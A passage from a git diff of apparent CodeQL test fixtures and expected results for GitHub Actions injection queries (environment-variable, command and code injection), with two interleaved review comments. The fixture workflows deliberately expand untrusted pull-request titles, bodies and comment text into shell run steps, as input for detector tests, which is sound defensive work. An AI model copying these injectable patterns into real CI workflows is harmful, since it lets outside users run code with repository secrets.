| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref new file mode 100644 index 00000000000..b3f6c4bf782 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref new file mode 100644 index 00000000000..fc6a3a80c98 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref deleted file mode 100644 index ba2d522c03d..00000000000 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref deleted file mode 100644 index 4562004b990..00000000000 
--- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-077/PrivilegedEnvVarInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
deleted file mode 100644
index e38b88f2919..00000000000
--- a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-078/CommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
similarity index 61%
rename from ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected
rename to ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
index 8829557368b..e2fe23cccc6 100644
--- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
@@ -4,5 +4,5 @@ nodes | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | 
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
new file mode 100644
index 00000000000..0cdb9a399a8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
@@ -0,0 +1 @@
+Security/CWE-078/CommandInjectionCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/CommandInjection.expected
rename to ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
new file mode 100644
index 00000000000..8e1bab538bb
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
@@ -0,0 +1 @@
+Security/CWE-078/CommandInjectionMedium.ql
diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref
deleted file mode 100644
index 2c7cc5c5fde..00000000000
--- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-078/PrivilegedCommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
new file mode 100644
index 00000000000..ba7d3eec1af
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
@@ -0,0 +1,7 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/action2/action.yml
rename to ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
new file mode 100644
index 00000000000..510ad86cbfa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
@@ -0,0 +1,9 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ env:
+ FOO: ${{ secrets.FOO}}
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
new file mode 100644
index 00000000000..ba7d3eec1af
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
@@ -0,0 +1,7 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
new file mode 100644
index 00000000000..13c246f4ff3
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
@@ -0,0 +1,26 @@
+name: 'Test'
+description: 'Test'
+inputs:
+ taint:
+ description: 'text'
+ required: true
+ default: 'Foo'
+outputs:
+ result:
+ description: "result"
+ value: ${{ steps.step.outputs.result }}
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
+ - name: Step
+ id: step
+ env:
+ FOO: ${{ inputs.taint }}
+ shell: bash
+ run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT
+ - name: Sink
+ id: sink
+ shell: bash
+ run: echo "${{ inputs.taint }}"
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
deleted file mode 100644
index b0a1ea5ed68..00000000000
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: '📋'
-
-on:
- pull_request:
- branches: [master]
-
-jobs:
- changelog:
- uses: ./.github/workflows/changelog.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml
deleted file mode 100644
index 8a3b1b02a63..00000000000
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: '📋'
-
-on:
- pull_request_target:
- branches: [master]
-
-jobs:
- changelog:
- uses: ./.github/workflows/changelog_from_prt.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
new file mode 100644
index 00000000000..9818ad42079
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
@@ -0,0 +1,10 @@
+name: Issue Workflow
+on:
+ pull_request_target:
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: .github/actions/action1
+
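Review bot: The `uses: .github/actions/action1` step in composite-action-caller-1.yml has no leading `./`, which is the form GitHub Actions requires for an action stored in the same repository; without it the value reads as an `owner/repo/path` reference with no `@ref`. composite-action-caller-2.yml and composite-action-caller-3.yml (`.github/actions/action5`) use the same spelling, while the reusable-workflow callers in this commit do write `./.github/workflows/...`. A fixture that a real runner would reject means the test does not show that local-action resolution works for the spelling found in real workflows, so I would change these to `- uses: ./.github/actions/action1` (and `./.github/actions/action5`), or add a second caller with the `./` form if both spellings are meant to resolve.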
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
new file mode 100644
index 00000000000..e5df2a514f4
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
@@ -0,0 +1,10 @@
+name: Issue Workflow
+on:
+ pull_request:
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: .github/actions/action1
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
new file mode 100644
index 00000000000..231cddd0b88
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
@@ -0,0 +1,14 @@
+name: Issue Workflow
+on:
+ issue_comment:
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: .github/actions/action5
+ id: foo
+ with:
+ taint: ${{ github.event.comment.body }}
+ - run: echo "${{ steps.foo.outputs.result }}"
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
similarity index 90%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
index 0ee850f183d..0c4aa93c7a5 100644
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
@@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: @@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml similarity index 90% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0ee850f183d..0c4aa93c7a5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: 
@@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml new file mode 100644 index 00000000000..9c0b72dffea --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -0,0 +1,11 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + permissions: {} + uses: ./.github/workflows/reusable-workflow-1.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml new file mode 100644 index 00000000000..46be8d7009d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + uses: ./.github/workflows/reusable-workflow-2.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref deleted file mode 100644 index fe9adbf3b64..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CodeInjection.ql 
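Review bot: reusable-workflow-caller-1.yml and reusable-workflow-caller-2.yml differ only in `permissions: {}` on the calling job, and the two called workflows end up as the same blob (`0c4aa93c7a5`), so nothing in the fixtures says what result each caller is expected to produce. An empty permissions map removes the token scopes, but the `${{ inputs.taint }}` expansion in the called `run:` step still evaluates text taken from `github.event.comment.body`, so the distinction matters for how the finding is rated. I would add a one-line comment above each `uses:`, for example `# permissions: {} - token has no scopes; injection is still expected to be reported` in caller-1, with the wording adjusted to whatever the Critical/Medium split is meant to assert.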
diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected similarity index 65% rename from ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 848e08cf69e..67c8bbc2b65 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | 
@@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -229,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | 
@@ -256,100 +259,80 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
